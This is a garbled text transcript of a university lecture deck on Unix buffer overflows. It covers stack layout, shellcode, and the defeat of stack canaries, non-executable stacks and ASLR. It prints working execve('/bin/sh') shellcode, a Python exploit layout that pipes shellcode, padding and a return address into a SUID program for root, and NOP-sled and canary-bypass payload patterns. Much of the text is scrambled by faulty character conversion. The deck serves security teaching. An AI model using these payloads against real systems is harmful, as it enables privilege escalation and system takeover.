unix application buffer overflow
TRANSCRIPT
-
8/9/2019 Unix Application Buffer Overflow
1/54
UNIX SECURITY
BATTLE OF
PROTECTIONS VS EXPLOITATIONS
Ammarit Thongthua
Mahidol UniversityMaster degree of
Cyber Security and Information Assurance
-
8/9/2019 Unix Application Buffer Overflow
2/54
AGENDA
Introduction Vulnerable Unix application
Memory Space and Stack Layout
Bufer !er"o#
Unix application $e!er%e En&ineer
S'ell(ode )rotection !% Expliotation Ba%ic Stack #it'out protection * Demo
Bypa%% pa%%#ord protection Exploit to &et root pri!ile&e
Limited Stack Space * Demo
StackGuard +(anary, * DemoNon-Executable-Stack +N., * Demo
Addre%% Space Layout $andomi/ation +ASL$,De0eat #it' %tatic %y%tem library +kernel 1 234325 , * Demo
ASL$ #it' remo!ed Static %y%tem library
De0eat #it' application #rappin& +kernel 67 234325 , * Demo
-
8/9/2019 Unix Application Buffer Overflow
3/54
VULNE$ABLE UNI. A))LI(A8IN
9a% permi%%ion :root; a% u%er or &roup
SUID or SGID i% %et +Stin& S at e.ecute bit,8'i% 2 criteria pro!ided pri!ile&e e%calation to be
root
-
8/9/2019 Unix Application Buffer Overflow
4/54
VULNE$ABLE UNI. A))LI(A8IN
U%e !ulnerable input %tandard 0unction Ex< %trcp+,= &et%+,
8'ey make t'e pro&ram can po%%ibly%e&mentation 0ault +bufer o!er"o#,
-
8/9/2019 Unix Application Buffer Overflow
5/54
MEM$> ADD$ESS AND S8A(?LA>U8
char pw[608];
-
8/9/2019 Unix Application Buffer Overflow
6/54
MEM$> ADD$ESS AND S8A(?LA>U8
0xFFFFFFFF
0x00000000
Code Segment
Data Segment
DSS Segment
Heap
Stack
Char pw[608];
Int i = 0;
-
8/9/2019 Unix Application Buffer Overflow
7/54
MEM$> ADD$ESS AND S8A(?LA>U8
0xFFFFFFFF
0x00000000
Stack Int i = 0;
..
Previous Stacks
Main()
-
8/9/2019 Unix Application Buffer Overflow
8/54
MEM$> ADD$ESS AND S8A(?LA>U8
0xFFFFFFFF
0x00000000
Stack
Char pw[608];
Int i = 0;
..
Previous Stacks
Main()
checkpw()SFP
RP
-
8/9/2019 Unix Application Buffer Overflow
9/54
BU@@E$ VE$@L
8'e %ituation #'en t'e data t'at input to t'e%y%tem i% lar&er t'an t'e %i/e o0 bufer t'at declare to be u%ed
AAAAAAAAAA....[607 of A].AAA\x00SFP RP
AAAAAAAAAA.[616 of A].AAAAAAAAAAAAAA\x00
SFP =0x41414141
***RP =0x41414141
Segmentation fault
Illegal Instruction
SFP RP
Ex: char pw[608];
-
8/9/2019 Unix Application Buffer Overflow
10/54
BU@@E$ VE$@L
AAAAAAAAAAAAA.[612 of A].AAAAAAA
SFP =0x41414141
***RP =0x080484c7
Segmentation fault
Illegal Instruction
SFP RP
0x080484c7
-
8/9/2019 Unix Application Buffer Overflow
11/54
BU@@E$ VE$@L
-
8/9/2019 Unix Application Buffer Overflow
12/54
BU@@E$ VE$@L
Demo #1
Bypass password protection
-
8/9/2019 Unix Application Buffer Overflow
13/54
BU@@E$ VE$@L
[Malicious Machine OpCode] + [ PADDING ]
SFP =0x41414141
***RP =0xFBFF0544
0xF
BFF0544
0xFBFF0544
SFP RP
Attacker can control return pointer to run Maliciou%Mac'ine p(ode t'at put to memory +S'ell (ode,3
In%ert %'ell code a% a part o0 input to reduce t'ecomplexity o0 exploitation
-
8/9/2019 Unix Application Buffer Overflow
14/54
S9ELL (DE
S'ell code i% t'e code t'at attacker #ant t'e%y%tem run in order to operate t'e command a%attacker need +create 0orm a%%embly and con!ert to p(ode
Ex pen port 0or connection to t'at %y%tem #it' root
pri!ile&e Add u%er to t'e %y%tem $un %'ell a% root pri!ile&e
S'ell code i% #ritten a% 9exadecimal 0ormat
-
8/9/2019 Unix Application Buffer Overflow
15/54
S9ELL (DE
31 c05068 2f 2f 7368 68 2f 62
69 6e89E350 53 89e1 b0 0bcd 80
Assembly Code Op Code
Shell Code
: execve(/bin/sh)
-
8/9/2019 Unix Application Buffer Overflow
16/54
-
8/9/2019 Unix Application Buffer Overflow
17/54
'ere can #e &et %'ell code u%e to make exploit3 C (reate your o#n %'ell code +uite take time,
U%e Meta%ploit to &enerate %'ell code
Metepreter
Searc' 0rom internet %'ell-%torm3or&%'ellcode packet%torm%ecurity3com ###3exploit-db3comexploit%
S9ELL (DE
-
8/9/2019 Unix Application Buffer Overflow
18/54
-
8/9/2019 Unix Application Buffer Overflow
19/54
E.)LI8 (DE
[Shell Code] + [PADDING make size to 612 ]
SFP =0x41414141
***RP =0xBFFF520
0xBFFF520
SFP RP
Exp = Shellcode + PAD + RP
612 bytes 4 bytes
0xBFFF520
-
8/9/2019 Unix Application Buffer Overflow
20/54
Shellcode = \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
RP = \x20\xf5\x\xbf # 0xB520
Ex! = code $!%&ho' c( )!*+'& ,-528. $ RP
(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((user@host:$ python exp.py | ./vul_app
E.)LI8 (DE
-
8/9/2019 Unix Application Buffer Overflow
21/54
E.)LI8 (DE
Sometime re%ult o0 our exploit i% cra%' FFF
'at 'appen C
[Shell Code] + [PADDING make size to 612 ]0xBFFF520
-
8/9/2019 Unix Application Buffer Overflow
22/54
[ Shell Code ] + [ 577 Byte of PADDING ]0xBFFF520
E.)LI8 (DE
[400B. Landing space] +[Shell Code] + [177 B. PADDING ]0xBFFF540
NOP (\x90) = Do nothing
-
8/9/2019 Unix Application Buffer Overflow
23/54
-
8/9/2019 Unix Application Buffer Overflow
24/54
E.)LI8 (DE
'en exploit %ucce%%0ully
-
8/9/2019 Unix Application Buffer Overflow
25/54
BASI( S8A(? I89U8 )$8E(8IN
Demo #2
Exploit to get root privilege
-
8/9/2019 Unix Application Buffer Overflow
26/54
-
8/9/2019 Unix Application Buffer Overflow
27/54
LIMI8ED S8A(? S)A(E
***RP =0xBFFFF7B0
-
8/9/2019 Unix Application Buffer Overflow
28/54
-
8/9/2019 Unix Application Buffer Overflow
29/54
-
8/9/2019 Unix Application Buffer Overflow
30/54
-
8/9/2019 Unix Application Buffer Overflow
31/54
-
8/9/2019 Unix Application Buffer Overflow
32/54
-
8/9/2019 Unix Application Buffer Overflow
33/54
-
8/9/2019 Unix Application Buffer Overflow
34/54
8DA>
Bypa%% limited %tack %pace by ret-2-libc
StackGuard +(anary, and De0eat
Non-Executable-Stack +N., and De0eat
Addre%% Space Layout $andomi/ation +ASL$,De0eat #it' %tatic %y%tem library +kernel 1 234325 ,ASL$ #it' remo!ed Static %y%tem library
De0eat #it' application #rappin& +kernel 67 234325 ,
-
8/9/2019 Unix Application Buffer Overflow
35/54
-
8/9/2019 Unix Application Buffer Overflow
36/54
-
8/9/2019 Unix Application Buffer Overflow
37/54
@ind location o0 :%y%tem; call 0unction
B>)ASS LIMI8ED S8A(? S)A(E B> $E8-2-LIB(
-
8/9/2019 Unix Application Buffer Overflow
38/54
-
8/9/2019 Unix Application Buffer Overflow
39/54
-
8/9/2019 Unix Application Buffer Overflow
40/54
-
8/9/2019 Unix Application Buffer Overflow
41/54
-
8/9/2019 Unix Application Buffer Overflow
42/54
@or Null canary and 8erminator canary can bede0eated by :(anary repaired; NULL canary only app u%e &et%+, 0unction
AAAKAAA55555555AAAA$) x5x5x5xS'ellcodex5a
8erminator canary +al#ay% 5x55555af, app u%e &et%+, 0unction app u%e %trcpy+, 0unction and need more t'an O ar&
AAAKAAAAAAA5afAAAA$) x5x5x5xS'ellcode55
BBBKBBBBB55
(((K(((55
AAAKAAA55555afAAAA$) x5x5x5xS'ellcode
S8A(? GUA$D +(ANA$>, DE@EA8
Arg1=
Arg2=
Arg3=
-
8/9/2019 Unix Application Buffer Overflow
43/54
-
8/9/2019 Unix Application Buffer Overflow
44/54
-
8/9/2019 Unix Application Buffer Overflow
45/54
-
8/9/2019 Unix Application Buffer Overflow
46/54
ADD$ESS S)A(E LA>U8$ANDMIPA8IN +ASL$,
8ec'niue u%e pre!ent an attacker Qumpin&to a particular exploited code in memory byrandom t'e !irtual addre%%in e!ery runtime3
-
8/9/2019 Unix Application Buffer Overflow
47/54
ADD$ESS S)A(E LA>U8
-
8/9/2019 Unix Application Buffer Overflow
48/54
$ANDMIPA8IN +ASL$, DE@EA8 ME89D
AAAAAAAAAAAAAAAAAAAAAAA RP /x90/x90/x90/x[ shell code ].
JMP ESP
esp
I0 S kernel 'a% %ome %tatic lib3 U%e RM) ES)in%truction in t'at %tatic lib to brin& $) to %'ell code
INC EAX ADD EBS, EBP .
ADD$ESS S)A(E LA>U8
-
8/9/2019 Unix Application Buffer Overflow
49/54
$ANDMIPA8IN +ASL$, DE@EA8 ME89D
I0 S kernel 'a% not %tatic lib= need to #riteapplication to call !ulnerable application to limit random addre%% %pace +App #rap up,
AAAAAAAAAAAAAAAAAAAAAAAAA
RP /x90/x90/x90/x90/x90/x90/x90/x90
/x90/x90/x90/x90/x90/x90/x90/x90/x90
/x90/x90/x90/x90/x[ shell code ]
Check current ESP value
and Set
RP = ESP + [vul app buffer]
-
8/9/2019 Unix Application Buffer Overflow
50/54
-
8/9/2019 Unix Application Buffer Overflow
51/54
-
8/9/2019 Unix Application Buffer Overflow
52/54
-
8/9/2019 Unix Application Buffer Overflow
53/54
$E@E$EN(E
)rotectin& A&ain%t Addre%% Space Layou$andomi/ation +ASL$, (ompromi%e% and $eturn-to-Libc Attack% U%in& Net#ork Intru%ion Detection Sy%tem%3 Da!id R3 Day= P'en&-.u P'
ao= No!ember 25OO= Volume H= I%%ue J= pp J2-JHT
(o#an= (3 Bufer !er"o# Attack%3StackGuard
-
8/9/2019 Unix Application Buffer Overflow
54/54